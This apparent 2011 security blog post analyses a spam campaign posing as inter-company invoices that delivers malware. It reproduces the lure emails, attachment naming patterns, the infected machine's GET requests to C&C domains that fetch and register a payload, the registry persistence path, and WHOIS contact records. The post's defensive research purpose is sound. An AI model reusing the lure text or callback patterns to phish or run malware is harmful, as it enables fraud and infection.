Wednesday, August 10, 2011

Inter-company Invoice spam leads to Malware

This morning we are seeing a new spam campaign in the UAB Spam Data Mine. Volumes are still low, but the count is rising steadily, and the detection so far is horrible. When I started writing this post we had seen 710 copies. It's now up to 1389 copies and counting!



count | mbox

-------+---------------------

1 | 2011-08-10 05:45:00

6 | 2011-08-10 06:00:00

3 | 2011-08-10 06:15:00

85 | 2011-08-10 06:30:00

1 | 2011-08-10 06:45:00

3 | 2011-08-10 07:00:00

1 | 2011-08-10 07:15:00

301 | 2011-08-10 07:30:00

252 | 2011-08-10 07:45:00

260 | 2011-08-10 08:00:00

247 | 2011-08-10 08:15:00

229 | 2011-08-10 08:30:00

(12 rows)





The spam pretends to be an invoice from a random company. So far this morning we've seen spam claiming to be an invoice from:



Aleris International Corp.

AMR Corporation Corp.

Anic Corp.

Arch Coal Corp.

ATFT Corp

Beazer Homes USA Corp.

Boyd Gaming Corp.

Brookdale Senior Living Corp.

Hyland Software Corp.

KPMG Corp.

Kraft Foods Corp.

Miltek Corp.

Novellus Systems Corp.

OSN Corp.

PDC Corp.

Safeco Corporation Corp.

WLC Corp.



Subject can be:



Re: Fw: Inter-company inv. from (company)

Re: Fw: Inter-company inv. from (company)

Re: Fw: Inter-company invoice from (company)

Re: Fw: Intercompany invoice from (company)

Re: Fw: Corp. invoice from (company)



A couple example emails follow:






Hi

Attached the inter-company inv. for the period January 2010 til December 2010.



Thanks a lot for support setting up this process.



CHERYL Flowers

Kraft Foods Corp.





Hi



Attached the inter-company inv. for the period January 2010 til December 2010.

Thanks a lot



Asher GIFFORD

Anic Corp.





Good day





Attached the intercompany invoice for the period January 2010 til December 2010.



Thanks a lot for supporting this process

MAYOLA LEARY

Aleris International Corp.







The attachment may be named "Intinvoice" or "Invoice" followed by an underscore, a date, and an "invoice number" ".zip" such as:



Intinvoice_08.6.2011_2222341965.zip

or

Intinvoice_08.4.2011_Q167829.zip

or

Invoice_08.6.2011_T40099.zip





We've seen 1300+ copies so far in the UAB Spam Data Mine, and I have 15 in my personal email.



So far, all have had the same attachment MD5, which yields a 6 of 43 detection rate on this VirusTotal Report.



So far everyone is just saying it is "Suspicious" or "Generic" ... which is our invitation to infect ourselves and figure out what it does!



When we launched the malware, we made a connection to "armaturan.ru" on 94.199.48.152.



We also talked to "ss-partners.ru" on 77.120.114.100

and to "ledinit.ru" on 78.111.51.121



The connection to armaturan.ru did:



GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}



which seems to be uniquely registering our machine, and giving seller #4 credit for my infection?



From ss-partners.ru we fetched a file:



GET /dump/light.exe



which dropped an approximately 70k file onto our local machine.



Then we went back to armaturan.ru and sent another get:



GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485



Any bets on whether that ahash is the MD5 of the file I just downloaded?



Looks like I just reported back to the C&C that I successfully downloaded and installed malware with that MD5.



At this point I checked my registry and found that I had a new Run command for next time I restart. I'm supposed to run:



C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE



Odd, I don't recall having a file named that?



Actually, we confirmed that this is the file that was downloaded as "light.exe" above. The VirusTotal report shows only 4 of 43 infection reports for this file as well. See VirusTotal Report.



Unfortunately, it disproves my MD5 theory. This is NOT the "ahash" value. This file's MD5 is f58d5cbb564069eca8806d4e48d7a714.



Launching the second file caused the machine to open an SSL tunnel to 78.111.51.121 and then sit idle.



You may recognize that as the IP address for "ledinit.ru" earlier, but it didn't make a connection by name. It went straight for the IP address. If that IP sounds familiar, it's probably because there have been many other malware campaigns tied to the network "Azerbaijan Baku Sol Ltd", but I'm sure that's just because it's a very large network.



78.111.51.100 is currently hosting three live Zeus C&C servers. Surely a coincidence.



fileuplarc.com

hunterdriveez.com

asdfasdgqghgsw.cx.cc



I'll email the owner and get those taken down right away! (smirk)



-----------



person: Vugar Kouliyev

address: 44, J.Jabbarli str., Baku, Azerbaijan

mnt-by: MNT-SOL

e-mail: vugar@kouliyev.com

phone: +994124971234

nic-hdl: VK1161-RIPE

source: RIPE # Filtered



route: 78.111.48.0/20

descr: SOL ISP

origin: AS43637

mnt-by: MNT-SOL

source: RIPE # Filtered



route: 78.111.51.0/24

descr: SOL ISP

origin: AS43637

mnt-by: MNT-SOL

source: RIPE # Filtered



----------------



Armaturan.ru on 94.199.48.152 also has a sordid history.



That IP address, in Hungary, has been associated with at least two active SpyEye domains: hdkajhslalskjd.ru and hhasdalkjjfasd.ru



I suppose we'll have to ask Mr. Zsolt nicely if he would remove those domains.



person: Zemancsik Zsolt

address: Victor Hugo u. 18-22.

address: 1132 Budapest

address: Hungary

phone: +36 203609059

e-mail: darwick@cyberground.hu

nic-hdl: DARW-RIPE

mnt-by: DARW-MNT

source: RIPE # Filtered



route: 94.199.48.0/21

descr: Originated from 23VNet Network

origin: AS30836

mnt-by: NET23-MNT

source: RIPE # Filtered



========

ss-partners.ru is on servers from Bellhost.ru, a customer of Volia DC



person: Volia DC Admin contact

address: Ukraine, Kiev, Kikvidze st. 1/2

phone: +38 044 2852716

abuse-mailbox: abuse@dc.volia.com

nic-hdl: VDCA-RIPE

mnt-by: VOLIA-DC-MNT

source: RIPE # Filtered



route: 77.120.96.0/19

descr: Volia more specific route

origin: AS25229

mnt-by: VOLIA-MNT

mnt-lower: VOLIA-MNT

source: RIPE # Filtered





No comments:

Post a Comment